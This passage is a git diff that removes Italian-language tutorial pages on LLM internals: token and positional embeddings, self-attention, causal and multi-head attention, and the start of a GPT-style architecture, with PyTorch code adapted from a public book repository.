-tensor([[ 0.3374, -0.1778, -0.1690],
-[ 0.9178,  1.5810,  1.3010],
-[ 1.2753, -0.2010, -0.1606],
-[-0.4015,  0.9666, -1.1481],
-[-1.1589,  0.3255, -0.6315],
-[-2.8400, -0.7849, -1.4096]], requires_grad=True)
-```
-**Spiegazione:**
-
- Ogni riga corrisponde a un token nel vocabolario.
- Ogni colonna rappresenta una dimensione nel vettore di embedding.
- Ad esempio, il token all'indice `3` ha un vettore di embedding `[-0.4015, 0.9666, -1.1481]`.
-
-**Accesso all'Embedding di un Token:**
-```python
-# Retrieve the embedding for the token at index 3
-token_index = torch.tensor([3])
-print(embedding_layer(token_index))
-```
-**Uscita:**
-```lua
-tensor([[-0.4015,  0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
-```
-**Interpretazione:**
-
- Il token all'indice `3` è rappresentato dal vettore `[-0.4015, 0.9666, -1.1481]`.
- Questi valori sono parametri addestrabili che il modello regolerà durante l'addestramento per rappresentare meglio il contesto e il significato del token.
-
-### **Come Funzionano gli Embedding dei Token Durante l'Addestramento**
-
-Durante l'addestramento, ogni token nei dati di input viene convertito nel suo corrispondente vettore di embedding. Questi vettori vengono poi utilizzati in vari calcoli all'interno del modello, come meccanismi di attenzione e strati di rete neurale.
-
-**Scenario Esemplare:**
-
- **Dimensione del Batch:** 8 (numero di campioni elaborati simultaneamente)
- **Lunghezza Massima della Sequenza:** 4 (numero di token per campione)
- **Dimensioni dell'Embedding:** 256
-
-**Struttura dei Dati:**
-
- Ogni batch è rappresentato come un tensore 3D con forma `(batch_size, max_length, embedding_dim)`.
- Per il nostro esempio, la forma sarebbe `(8, 4, 256)`.
-
-**Visualizzazione:**
-```css
-cssCopy codeBatch
-┌─────────────┐
-│ Sample 1    │
-│ ┌─────┐     │
-│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
-│ │ 1   │     │
-│ │...  │     │
-│ │Token│     │
-│ │ 4   │     │
-│ └─────┘     │
-│ Sample 2    │
-│ ┌─────┐     │
-│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
-│ │ 1   │     │
-│ │...  │     │
-│ │Token│     │
-│ │ 4   │     │
-│ └─────┘     │
-│ ...         │
-│ Sample 8    │
-│ ┌─────┐     │
-│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
-│ │ 1   │     │
-│ │...  │     │
-│ │Token│     │
-│ │ 4   │     │
-│ └─────┘     │
-└─────────────┘
-```
-**Spiegazione:**
-
- Ogni token nella sequenza è rappresentato da un vettore di 256 dimensioni.
- Il modello elabora questi embedding per apprendere i modelli linguistici e generare previsioni.
-
-## **Embedding Posizionali: Aggiungere Contesto agli Embedding dei Token**
-
-Mentre gli embedding dei token catturano il significato dei singoli token, non codificano intrinsecamente la posizione dei token all'interno di una sequenza. Comprendere l'ordine dei token è cruciale per la comprensione del linguaggio. Qui entrano in gioco gli **embedding posizionali**.
-
-### **Perché Sono Necessari gli Embedding Posizionali:**
-
- **L'Ordine dei Token Conta:** Nelle frasi, il significato spesso dipende dall'ordine delle parole. Ad esempio, "Il gatto è seduto sul tappeto" vs. "Il tappeto è seduto sul gatto."
- **Limitazione degli Embedding:** Senza informazioni posizionali, il modello tratta i token come un "sacco di parole", ignorando la loro sequenza.
-
-### **Tipi di Embedding Posizionali:**
-
-1. **Embedding Posizionali Assoluti:**
- Assegnano un vettore di posizione unico a ciascuna posizione nella sequenza.
- **Esempio:** Il primo token in qualsiasi sequenza ha lo stesso embedding posizionale, il secondo token ne ha un altro, e così via.
- **Usato Da:** I modelli GPT di OpenAI.
-2. **Embedding Posizionali Relativi:**
- Codificano la distanza relativa tra i token piuttosto che le loro posizioni assolute.
- **Esempio:** Indicano quanto sono distanti due token, indipendentemente dalle loro posizioni assolute nella sequenza.
- **Usato Da:** Modelli come Transformer-XL e alcune varianti di BERT.
-
-### **Come Vengono Integrati gli Embedding Posizionali:**
-
- **Stesse Dimensioni:** Gli embedding posizionali hanno la stessa dimensionalità degli embedding dei token.
- **Addizione:** Vengono aggiunti agli embedding dei token, combinando l'identità del token con le informazioni posizionali senza aumentare la dimensionalità complessiva.
-
-**Esempio di Aggiunta di Embedding Posizionali:**
-
-Supponiamo che un vettore di embedding del token sia `[0.5, -0.2, 0.1]` e il suo vettore di embedding posizionale sia `[0.1, 0.3, -0.1]`. L'embedding combinato utilizzato dal modello sarebbe:
-```css
-Combined Embedding = Token Embedding + Positional Embedding
-= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
-= [0.6, 0.1, 0.0]
-```
-**Vantaggi degli Embedding Posizionali:**
-
- **Consapevolezza Contestuale:** Il modello può differenziare tra i token in base alle loro posizioni.
- **Comprensione della Sequenza:** Consente al modello di comprendere grammatica, sintassi e significati dipendenti dal contesto.
-
-## Esempio di Codice
-
-Seguendo l'esempio di codice da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
-```python
-# Use previous code...
-
-# Create dimensional emdeddings
-"""
-BPE uses a vocabulary of 50257 words
-Let's supose we want to use 256 dimensions (instead of the millions used by LLMs)
-"""
-
-vocab_size = 50257
-output_dim = 256
-token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
-
-## Generate the dataloader like before
-max_length = 4
-dataloader = create_dataloader_v1(
-raw_text, batch_size=8, max_length=max_length,
-stride=max_length, shuffle=False
-)
-data_iter = iter(dataloader)
-inputs, targets = next(data_iter)
-
-# Apply embeddings
-token_embeddings = token_embedding_layer(inputs)
-print(token_embeddings.shape)
-torch.Size([8, 4, 256]) # 8 x 4 x 256
-
-# Generate absolute embeddings
-context_length = max_length
-pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
-
-pos_embeddings = pos_embedding_layer(torch.arange(max_length))
-
-input_embeddings = token_embeddings + pos_embeddings
-print(input_embeddings.shape) # torch.Size([8, 4, 256])
-```
-## Riferimenti
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
+++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
@ -1,416 +0,0 @@
-# 4. Meccanismi di Attenzione
-
-## Meccanismi di Attenzione e Auto-Attenzione nelle Reti Neurali
-
-I meccanismi di attenzione consentono alle reti neurali di **concentrarsi su parti specifiche dell'input durante la generazione di ciascuna parte dell'output**. Assegnano pesi diversi a diversi input, aiutando il modello a decidere quali input sono più rilevanti per il compito in questione. Questo è cruciale in compiti come la traduzione automatica, dove comprendere il contesto dell'intera frase è necessario per una traduzione accurata.
-
-> [!TIP]
-> L'obiettivo di questa quarta fase è molto semplice: **Applicare alcuni meccanismi di attenzione**. Questi saranno molti **strati ripetuti** che andranno a **catturare la relazione di una parola nel vocabolario con i suoi vicini nella frase attuale utilizzata per addestrare il LLM**.\
-> Vengono utilizzati molti strati per questo, quindi molti parametri addestrabili andranno a catturare queste informazioni.
-
-### Comprendere i Meccanismi di Attenzione
-
-Nei modelli tradizionali di sequenza a sequenza utilizzati per la traduzione linguistica, il modello codifica una sequenza di input in un vettore di contesto di dimensione fissa. Tuttavia, questo approccio ha difficoltà con frasi lunghe perché il vettore di contesto di dimensione fissa potrebbe non catturare tutte le informazioni necessarie. I meccanismi di attenzione affrontano questa limitazione consentendo al modello di considerare tutti i token di input durante la generazione di ciascun token di output.
-
-#### Esempio: Traduzione Automatica
-
-Considera la traduzione della frase tedesca "Kannst du mir helfen diesen Satz zu übersetzen" in inglese. Una traduzione parola per parola non produrrebbe una frase inglese grammaticalmente corretta a causa delle differenze nelle strutture grammaticali tra le lingue. Un meccanismo di attenzione consente al modello di concentrarsi su parti rilevanti della frase di input durante la generazione di ciascuna parola della frase di output, portando a una traduzione più accurata e coerente.
-
-### Introduzione all'Auto-Attenzione
-
-L'auto-attenzione, o intra-attention, è un meccanismo in cui l'attenzione viene applicata all'interno di una singola sequenza per calcolare una rappresentazione di quella sequenza. Consente a ciascun token nella sequenza di prestare attenzione a tutti gli altri token, aiutando il modello a catturare le dipendenze tra i token indipendentemente dalla loro distanza nella sequenza.
-
-#### Concetti Chiave
-
- **Token**: Elementi individuali della sequenza di input (ad es., parole in una frase).
- **Embeddings**: Rappresentazioni vettoriali dei token, che catturano informazioni semantiche.
- **Pesi di Attenzione**: Valori che determinano l'importanza di ciascun token rispetto agli altri.
-
-### Calcolo dei Pesi di Attenzione: Un Esempio Passo-Passo
-
-Consideriamo la frase **"Hello shiny sun!"** e rappresentiamo ciascuna parola con un embedding a 3 dimensioni:
-
- **Hello**: `[0.34, 0.22, 0.54]`
- **shiny**: `[0.53, 0.34, 0.98]`
- **sun**: `[0.29, 0.54, 0.93]`
-
-Il nostro obiettivo è calcolare il **vettore di contesto** per la parola **"shiny"** utilizzando l'auto-attenzione.
-
-#### Passo 1: Calcolare i Punteggi di Attenzione
-
-> [!TIP]
-> Basta moltiplicare ciascun valore dimensionale della query con quello pertinente di ciascun token e sommare i risultati. Ottieni 1 valore per coppia di token.
-
-Per ciascuna parola nella frase, calcola il **punteggio di attenzione** rispetto a "shiny" calcolando il prodotto scalare dei loro embeddings.
-
-**Punteggio di Attenzione tra "Hello" e "shiny"**
-
-<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
-
-**Punteggio di Attenzione tra "shiny" e "shiny"**
-
-<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
-
-**Punteggio di Attenzione tra "sun" e "shiny"**
-
-<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
-
-#### Passo 2: Normalizzare i Punteggi di Attenzione per Ottenere i Pesi di Attenzione
-
-> [!TIP]
-> Non perderti nei termini matematici, l'obiettivo di questa funzione è semplice, normalizzare tutti i pesi in modo che **sommati diano 1 in totale**.
->
-> Inoltre, la funzione **softmax** è utilizzata perché accentua le differenze grazie alla parte esponenziale, rendendo più facile rilevare valori utili.
-
-Applica la **funzione softmax** ai punteggi di attenzione per convertirli in pesi di attenzione che sommano a 1.
-
-<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
-
-Calcolando le esponenziali:
-
-<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
-
-Calcolando la somma:
-
-<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
-
-Calcolando i pesi di attenzione:
-
-<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
-
-#### Passo 3: Calcolare il Vettore di Contesto
-
-> [!TIP]
-> Basta prendere ciascun peso di attenzione e moltiplicarlo per le dimensioni del token correlate e poi sommare tutte le dimensioni per ottenere solo 1 vettore (il vettore di contesto)
-
-Il **vettore di contesto** è calcolato come la somma pesata degli embeddings di tutte le parole, utilizzando i pesi di attenzione.
-
-<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
-
-Calcolando ciascun componente:
-
- **Embedding Pesato di "Hello"**:
-
-<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
- **Embedding Pesato di "shiny"**:
-
-<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
- **Embedding Pesato di "sun"**:
-
-<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-Sommando gli embeddings pesati:
-
-`vettore di contesto=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
-
-**Questo vettore di contesto rappresenta l'embedding arricchito per la parola "shiny", incorporando informazioni da tutte le parole nella frase.**
-
-### Riepilogo del Processo
-
-1. **Calcolare i Punteggi di Attenzione**: Utilizzare il prodotto scalare tra l'embedding della parola target e gli embeddings di tutte le parole nella sequenza.
-2. **Normalizzare i Punteggi per Ottenere i Pesi di Attenzione**: Applicare la funzione softmax ai punteggi di attenzione per ottenere pesi che sommano a 1.
-3. **Calcolare il Vettore di Contesto**: Moltiplicare l'embedding di ciascuna parola per il suo peso di attenzione e sommare i risultati.
-
-## Auto-Attenzione con Pesi Addestrabili
-
-In pratica, i meccanismi di auto-attenzione utilizzano **pesi addestrabili** per apprendere le migliori rappresentazioni per query, chiavi e valori. Questo comporta l'introduzione di tre matrici di peso:
-
-<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
-
-La query è i dati da utilizzare come prima, mentre le matrici di chiavi e valori sono semplicemente matrici casuali-addestrabili.
-
-#### Passo 1: Calcolare Query, Chiavi e Valori
-
-Ogni token avrà la propria matrice di query, chiave e valore moltiplicando i suoi valori dimensionale per le matrici definite:
-
-<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
-
-Queste matrici trasformano gli embeddings originali in un nuovo spazio adatto per il calcolo dell'attenzione.
-
-**Esempio**
-
-Assumendo:
-
- Dimensione di input `din=3` (dimensione dell'embedding)
- Dimensione di output `dout=2` (dimensione desiderata per query, chiavi e valori)
-
-Inizializza le matrici di peso:
-```python
-import torch.nn as nn
-
-d_in = 3
-d_out = 2
-
-W_query = nn.Parameter(torch.rand(d_in, d_out))
-W_key = nn.Parameter(torch.rand(d_in, d_out))
-W_value = nn.Parameter(torch.rand(d_in, d_out))
-```
-Calcola le query, le chiavi e i valori:
-```python
-queries = torch.matmul(inputs, W_query)
-keys = torch.matmul(inputs, W_key)
-values = torch.matmul(inputs, W_value)
-```
-#### Step 2: Calcola l'attenzione scalata dot-product
-
-**Calcola i punteggi di attenzione**
-
-Simile all'esempio precedente, ma questa volta, invece di utilizzare i valori delle dimensioni dei token, utilizziamo la matrice chiave del token (già calcolata utilizzando le dimensioni):. Quindi, per ogni query `qi` e chiave `kj`:
-
-<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
-
-**Scala i punteggi**
-
-Per evitare che i prodotti scalari diventino troppo grandi, scalali per la radice quadrata della dimensione della chiave `dk`:
-
-<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
-
-> [!TIP]
-> Il punteggio è diviso per la radice quadrata delle dimensioni perché i prodotti scalari potrebbero diventare molto grandi e questo aiuta a regolarli.
-
-**Applica Softmax per ottenere i pesi di attenzione:** Come nell'esempio iniziale, normalizza tutti i valori in modo che sommino 1.
-
-<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
-
-#### Step 3: Calcola i vettori di contesto
-
-Come nell'esempio iniziale, somma semplicemente tutte le matrici di valori moltiplicando ciascuna per il suo peso di attenzione:
-
-<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
-
-### Esempio di codice
-
-Prendendo un esempio da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) puoi controllare questa classe che implementa la funzionalità di auto-attenzione di cui abbiamo parlato:
-```python
-import torch
-
-inputs = torch.tensor(
-[[0.43, 0.15, 0.89], # Your     (x^1)
-[0.55, 0.87, 0.66], # journey  (x^2)
-[0.57, 0.85, 0.64], # starts   (x^3)
-[0.22, 0.58, 0.33], # with     (x^4)
-[0.77, 0.25, 0.10], # one      (x^5)
-[0.05, 0.80, 0.55]] # step     (x^6)
-)
-
-import torch.nn as nn
-class SelfAttention_v2(nn.Module):
-
-def __init__(self, d_in, d_out, qkv_bias=False):
-super().__init__()
-self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-
-def forward(self, x):
-keys = self.W_key(x)
-queries = self.W_query(x)
-values = self.W_value(x)
-
-attn_scores = queries @ keys.T
-attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
-
-context_vec = attn_weights @ values
-return context_vec
-
-d_in=3
-d_out=2
-torch.manual_seed(789)
-sa_v2 = SelfAttention_v2(d_in, d_out)
-print(sa_v2(inputs))
-```
-> [!NOTE]
-> Nota che invece di inizializzare le matrici con valori casuali, `nn.Linear` viene utilizzato per contrassegnare tutti i pesi come parametri da addestrare.
-
-## Causal Attention: Nascondere Parole Future
-
-Per i LLM vogliamo che il modello consideri solo i token che appaiono prima della posizione attuale per **prevedere il prossimo token**. **Causal attention**, nota anche come **masked attention**, raggiunge questo obiettivo modificando il meccanismo di attenzione per impedire l'accesso ai token futuri.
-
-### Applicare una Maschera di Causal Attention
-
-Per implementare la causal attention, applichiamo una maschera ai punteggi di attenzione **prima dell'operazione softmax** in modo che quelli rimanenti sommino ancora 1. Questa maschera imposta i punteggi di attenzione dei token futuri a meno infinito, garantendo che dopo il softmax, i loro pesi di attenzione siano zero.
-
-**Passaggi**
-
-1. **Calcolare i Punteggi di Attenzione**: Stesso di prima.
-2. **Applicare la Maschera**: Utilizzare una matrice triangolare superiore riempita con meno infinito sopra la diagonale.
-
-```python
-mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
-masked_scores = attention_scores + mask
-```
-
-3. **Applicare Softmax**: Calcolare i pesi di attenzione utilizzando i punteggi mascherati.
-
-```python
-attention_weights = torch.softmax(masked_scores, dim=-1)
-```
-
-### Mascherare Pesi di Attenzione Aggiuntivi con Dropout
-
-Per **prevenire l'overfitting**, possiamo applicare **dropout** ai pesi di attenzione dopo l'operazione softmax. Il dropout **azzera casualmente alcuni dei pesi di attenzione** durante l'addestramento.
-```python
-dropout = nn.Dropout(p=0.5)
-attention_weights = dropout(attention_weights)
-```
-Un dropout regolare è di circa il 10-20%.
-
-### Esempio di Codice
-
-Esempio di codice da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
-```python
-import torch
-import torch.nn as nn
-
-inputs = torch.tensor(
-[[0.43, 0.15, 0.89], # Your     (x^1)
-[0.55, 0.87, 0.66], # journey  (x^2)
-[0.57, 0.85, 0.64], # starts   (x^3)
-[0.22, 0.58, 0.33], # with     (x^4)
-[0.77, 0.25, 0.10], # one      (x^5)
-[0.05, 0.80, 0.55]] # step     (x^6)
-)
-
-batch = torch.stack((inputs, inputs), dim=0)
-print(batch.shape)
-
-class CausalAttention(nn.Module):
-
-def __init__(self, d_in, d_out, context_length,
-dropout, qkv_bias=False):
-super().__init__()
-self.d_out = d_out
-self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.dropout = nn.Dropout(dropout)
-self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
-
-def forward(self, x):
-b, num_tokens, d_in = x.shape
-# b is the num of batches
-# num_tokens is the number of tokens per batch
-# d_in is the dimensions er token
-
-keys = self.W_key(x) # This generates the keys of the tokens
-queries = self.W_query(x)
-values = self.W_value(x)
-
-attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
-attn_scores.masked_fill_(  # New, _ ops are in-place
-self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
-attn_weights = torch.softmax(
-attn_scores / keys.shape[-1]**0.5, dim=-1
-)
-attn_weights = self.dropout(attn_weights)
-
-context_vec = attn_weights @ values
-return context_vec
-
-torch.manual_seed(123)
-
-context_length = batch.shape[1]
-d_in = 3
-d_out = 2
-ca = CausalAttention(d_in, d_out, context_length, 0.0)
-
-context_vecs = ca(batch)
-
-print(context_vecs)
-print("context_vecs.shape:", context_vecs.shape)
-```
-## Estensione dell'attenzione a testa singola all'attenzione a più teste
-
-**L'attenzione a più teste** in termini pratici consiste nell'eseguire **più istanze** della funzione di auto-attenzione, ognuna con **i propri pesi**, in modo che vengano calcolati vettori finali diversi.
-
-### Esempio di Codice
-
-Potrebbe essere possibile riutilizzare il codice precedente e aggiungere solo un wrapper che lo lancia più volte, ma questa è una versione più ottimizzata da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) che elabora tutte le teste contemporaneamente (riducendo il numero di costose iterazioni for). Come puoi vedere nel codice, le dimensioni di ciascun token sono suddivise in diverse dimensioni in base al numero di teste. In questo modo, se un token ha 8 dimensioni e vogliamo utilizzare 3 teste, le dimensioni saranno suddivise in 2 array di 4 dimensioni e ciascuna testa utilizzerà uno di essi:
-```python
-class MultiHeadAttention(nn.Module):
-def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
-super().__init__()
-assert (d_out % num_heads == 0), \
-"d_out must be divisible by num_heads"
-
-self.d_out = d_out
-self.num_heads = num_heads
-self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
-
-self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
-self.dropout = nn.Dropout(dropout)
-self.register_buffer(
-"mask",
-torch.triu(torch.ones(context_length, context_length),
-diagonal=1)
-)
-
-def forward(self, x):
-b, num_tokens, d_in = x.shape
-# b is the num of batches
-# num_tokens is the number of tokens per batch
-# d_in is the dimensions er token
-
-keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
-queries = self.W_query(x)
-values = self.W_value(x)
-
-# We implicitly split the matrix by adding a `num_heads` dimension
-# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
-keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
-values = values.view(b, num_tokens, self.num_heads, self.head_dim)
-queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
-
-# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
-keys = keys.transpose(1, 2)
-queries = queries.transpose(1, 2)
-values = values.transpose(1, 2)
-
-# Compute scaled dot-product attention (aka self-attention) with a causal mask
-attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
-
-# Original mask truncated to the number of tokens and converted to boolean
-mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
-
-# Use the mask to fill attention scores
-attn_scores.masked_fill_(mask_bool, -torch.inf)
-
-attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
-attn_weights = self.dropout(attn_weights)
-
-# Shape: (b, num_tokens, num_heads, head_dim)
-context_vec = (attn_weights @ values).transpose(1, 2)
-
-# Combine heads, where self.d_out = self.num_heads * self.head_dim
-context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
-context_vec = self.out_proj(context_vec) # optional projection
-
-return context_vec
-
-torch.manual_seed(123)
-
-batch_size, context_length, d_in = batch.shape
-d_out = 2
-mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)
-
-context_vecs = mha(batch)
-
-print(context_vecs)
-print("context_vecs.shape:", context_vecs.shape)
-
-```
-Per un'implementazione compatta ed efficiente, puoi utilizzare la [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) classe in PyTorch.
-
-> [!TIP]
-> Risposta breve di ChatGPT su perché è meglio dividere le dimensioni dei token tra le teste invece di far controllare a ciascuna testa tutte le dimensioni di tutti i token:
->
-> Sebbene consentire a ciascuna testa di elaborare tutte le dimensioni di embedding possa sembrare vantaggioso perché ogni testa avrebbe accesso a tutte le informazioni, la pratica standard è **dividere le dimensioni di embedding tra le teste**. Questo approccio bilancia l'efficienza computazionale con le prestazioni del modello e incoraggia ciascuna testa a imparare rappresentazioni diverse. Pertanto, dividere le dimensioni di embedding è generalmente preferito rispetto a far controllare a ciascuna testa tutte le dimensioni.
-
-## References
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md
+++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
@ -1,666 +0,0 @@
-# 5. Architettura LLM
-
-## Architettura LLM
-
-> [!TIP]
-> L'obiettivo di questa quinta fase è molto semplice: **Sviluppare l'architettura del LLM completo**. Metti tutto insieme, applica tutti i livelli e crea tutte le funzioni per generare testo o trasformare testo in ID e viceversa.
->
-> Questa architettura sarà utilizzata sia per l'addestramento che per la previsione del testo dopo che è stato addestrato.
-
-Esempio di architettura LLM da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
-
-Una rappresentazione ad alto livello può essere osservata in:
-
-<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
-
-1. **Input (Testo Tokenizzato)**: Il processo inizia con testo tokenizzato, che viene convertito in rappresentazioni numeriche.
-2. **Layer di Embedding dei Token e di Embedding Posizionale**: Il testo tokenizzato passa attraverso un **layer di embedding dei token** e un **layer di embedding posizionale**, che cattura la posizione dei token in una sequenza, fondamentale per comprendere l'ordine delle parole.
-3. **Blocchi Transformer**: Il modello contiene **12 blocchi transformer**, ciascuno con più livelli. Questi blocchi ripetono la seguente sequenza:
- **Attenzione Multi-Testa Mascherata**: Consente al modello di concentrarsi su diverse parti del testo di input contemporaneamente.
- **Normalizzazione del Livello**: Un passo di normalizzazione per stabilizzare e migliorare l'addestramento.
- **Layer Feed Forward**: Responsabile dell'elaborazione delle informazioni dal layer di attenzione e della formulazione di previsioni sul token successivo.
- **Layer di Dropout**: Questi layer prevengono l'overfitting eliminando casualmente unità durante l'addestramento.
-4. **Layer di Output Finale**: Il modello produce un **tensore di dimensione 4x50,257**, dove **50,257** rappresenta la dimensione del vocabolario. Ogni riga in questo tensore corrisponde a un vettore che il modello utilizza per prevedere la prossima parola nella sequenza.
-5. **Obiettivo**: L'obiettivo è prendere questi embedding e convertirli di nuovo in testo. In particolare, l'ultima riga dell'output viene utilizzata per generare la prossima parola, rappresentata come "forward" in questo diagramma.
-
-### Rappresentazione del Codice
-```python
-import torch
-import torch.nn as nn
-import tiktoken
-
-class GELU(nn.Module):
-def __init__(self):
-super().__init__()
-
-def forward(self, x):
-return 0.5 * x * (1 + torch.tanh(
-torch.sqrt(torch.tensor(2.0 / torch.pi)) *
-(x + 0.044715 * torch.pow(x, 3))
-))
-
-class FeedForward(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.layers = nn.Sequential(
-nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
-GELU(),
-nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
-)
-
-def forward(self, x):
-return self.layers(x)
-
-class MultiHeadAttention(nn.Module):
-def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
-super().__init__()
-assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
-
-self.d_out = d_out
-self.num_heads = num_heads
-self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
-
-self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
-self.dropout = nn.Dropout(dropout)
-self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
-
-def forward(self, x):
-b, num_tokens, d_in = x.shape
-
-keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
-queries = self.W_query(x)
-values = self.W_value(x)
-
-# We implicitly split the matrix by adding a `num_heads` dimension
-# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
-keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
-values = values.view(b, num_tokens, self.num_heads, self.head_dim)
-queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
-
-# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
-keys = keys.transpose(1, 2)
-queries = queries.transpose(1, 2)
-values = values.transpose(1, 2)
-
-# Compute scaled dot-product attention (aka self-attention) with a causal mask
-attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
-
-# Original mask truncated to the number of tokens and converted to boolean
-mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
-
-# Use the mask to fill attention scores
-attn_scores.masked_fill_(mask_bool, -torch.inf)
-
-attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
